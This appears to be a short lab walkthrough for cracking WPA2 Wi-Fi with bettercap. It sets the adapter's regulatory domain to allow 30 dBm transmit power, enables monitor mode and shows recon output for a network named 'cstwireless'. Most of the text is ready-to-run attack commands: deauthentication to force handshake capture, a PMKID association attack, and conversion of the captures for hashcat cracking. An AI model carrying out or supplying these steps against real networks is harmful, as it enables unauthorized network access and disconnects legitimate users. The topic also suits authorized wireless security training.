Set TX Power to 30 dBm
First, obtain the country the adapter is set to:
iw reg get
If not already set, change the regulatory domain to one of the following: BO, BZ, GY, NZ, VE
iw reg set BZ
Now set the interface transmit power:
ip link set wlan1 down
iw wlan1 set txpower fixed 3000
iw wlan1 set monitor control
ip link set wlan1 up
Test that everything works:
aireplay-ng --test wlan1
Start Bettercap 2 and specify the interface that is capable of injection and monitor mode
bettercap -iface wlan1
Inside Bettercap start wifi recon:
wifi.recon on
that should result in lots of wifi events being displayed: found APs, stations connecting and disconnecting.
By default, Bettercap saves all wifi-related data to /root/bettercap-wifi-handshakes.pcap
. To save the hashes to another file:
set wifi.handshakes.file /root/cst/cst-wireless.pcap
To show the results of the wireless recon, we run wifi.show
. However, in crowded areas, the output will fill a few screens so we need to filter it:
set wifi.show.filter '^cst.*'
This will restrict the SSIDs shown to only those that match the regexp.
Time to show the APs:
wifi.show
┌─────────┬───────────────────┬─────────────┬──────────────────┬─────┬─────┬─────────┬────────┬────────┬──────────┐
│ RSSI ▴ │ BSSID │ SSID │ Encryption │ WPS │ Ch │ Clients │ Sent │ Recvd │ Seen │
├─────────┼───────────────────┼─────────────┼──────────────────┼─────┼─────┼─────────┼────────┼────────┼──────────┤
│ -40 dBm │ 45:72:6d:82:ef:12 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 60 │ 2 │ 46 kB │ 11 kB │ 11:48:49 │
│ -40 dBm │ 45:72:7d:82:ef:13 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 1 │ 1 │ 110 kB │ 5.9 kB │ 11:48:56 │
│ -44 dBm │ 45:72:7d:82:55:26 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 6 │ 2 │ 373 kB │ 150 kB │ 11:48:58 │
│ -49 dBm │ 45:72:6d:87:1a:f1 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 136 │ 1 │ 20 kB │ 2.3 kB │ 11:48:55 │
│ -64 dBm │ 45:72:7d:87:1a:f2 │ cstwireless │ WPA2 (TKIP, PSK) │ │ 11 │ │ │ │ 11:48:44 │
│ -76 dBm │ 45:72:6d:87:55:ac │ cstwireless │ WPA2 (TKIP, PSK) │ │ 100 │ 8 │ 60 kB │ 116 kB │ 11:48:54 │
└─────────┴───────────────────┴─────────────┴──────────────────┴─────┴─────┴─────────┴────────┴────────┴──────────┘
The wifi recon will hop on every channel that the adapter is capable on tuning to. To make it stay on a specific channel:
wifi.recon.channel 1
If there are stations connected to the AP, try a deauth attack, specifying the APs BSSID (MAC address):
wifi.deauth 45:72:6d:82:ef:12
Bettercap will tell you every time a handshake was captured. If there are no stations, try the new PMKID attack:
wifi.assoc 45:72:7d:87:1a:f2
The file resulting after running this needs to be converted to a format recognizable by hashcat
:
hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap